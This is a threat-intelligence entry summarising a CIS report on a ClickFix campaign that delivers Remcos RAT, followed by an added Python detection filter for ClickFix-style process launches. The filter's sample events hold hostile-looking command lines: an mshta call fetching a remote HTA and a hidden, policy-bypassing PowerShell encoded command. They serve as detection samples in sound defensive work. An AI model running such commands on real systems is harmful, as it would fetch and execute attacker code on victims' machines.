ZPHP Campaign Delivering Remcos RAT Impacting SLTTs
ID: 8f19fd9e-b77b-533b-9cbe-605689f409bf
STIX ID: report--8f19fd9e-b77b-533b-9cbe-605689f409bf
Feed Name: CISecurity.org Insights Blog
CIS CTI warns of an ongoing ZPHP/SmartApeSG campaign targeting U.S. SLTT organizations. The operators inject malicious JavaScript into compromised websites to display a fake Cloudflare Turnstile CAPTCHA, then use the ClickFix clipboard trick to get the victim to paste and run a command that stages an HTA/PowerShell chain and ultimately deploys Remcos RAT, with the payload hidden via steganography and loaded through DLL sideloading. The report provides technical indicators, example C2 IPs, impact metrics (IDS alerts and nearly 500,000 MDBR-blocked DNS requests across 162 organizations), and mitigation recommendations.
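Because the ClickFix step relies on the victim pasting a command into the Windows Run dialog, the first process in the chain is normally a script host or shell whose parent is explorer.exe. The following is an added example (not code from the CIS report) of a small triage filter that applies that heuristic to process-creation events; the event records are constructed Sysmon-style samples, the IP address is an RFC 5737 documentation address rather than a real C2, and the parent-process and command-line patterns are assumptions drawn from the general ClickFix technique, not indicators taken from the report.

```python
import re
from pathlib import PureWindowsPath

# Script hosts and shells commonly launched from the Run dialog in ClickFix lures.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return PureWindowsPath(path).name.lower()


def clickfix_indicators(event: dict) -> list:
    """Return the reasons an event looks like a ClickFix launch, or [] if it does not.

    Heuristic (assumption, not from the report): the Run dialog is hosted by
    explorer.exe, so a script host spawned directly by explorer.exe with a
    remote URL, an encoded command, or a hidden window is worth a look.
    """
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return []
    reasons = []
    if URL_RE.search(cmdline):
        reasons.append("remote URL on command line")
    if ENCODED_RE.search(cmdline):
        reasons.append("base64-encoded command")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden window requested")
    return reasons


def scan_events(events: list) -> dict:
    """Map index -> reasons for every event that trips the heuristic."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = clickfix_indicators(ev)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample events in Sysmon Event ID 1 field style (not real telemetry).
SAMPLE_EVENTS = [
    {   # Run dialog -> mshta pulling a remote HTA (198.51.100.0/24 is a documentation range)
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe http://198.51.100.23/verify.hta",
    },
    {   # Run dialog -> hidden PowerShell with an encoded command (base64 of UTF-16LE "IEX ")
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -ep bypass -enc SQBFAFgAIAA=",
    },
    {   # Benign: a scheduled script started from cmd.exe, wrong parent for this heuristic
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
    },
    {   # Benign: browser renderer, not a script host
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": "chrome.exe --type=renderer",
    },
]

if __name__ == "__main__":
    for idx, reasons in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
        for r in reasons:
            print(f"  - {r}")
```

The filter is deliberately narrow: it only fires when explorer.exe is the parent, so it will miss a lure that instructs the user to open a terminal first, and an .hta double-clicked from a folder also has explorer.exe as parent but carries a local path rather than a URL and so is not flagged. Feed it the whole process-creation stream and review hits alongside the DNS and IDS telemetry the report describes.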
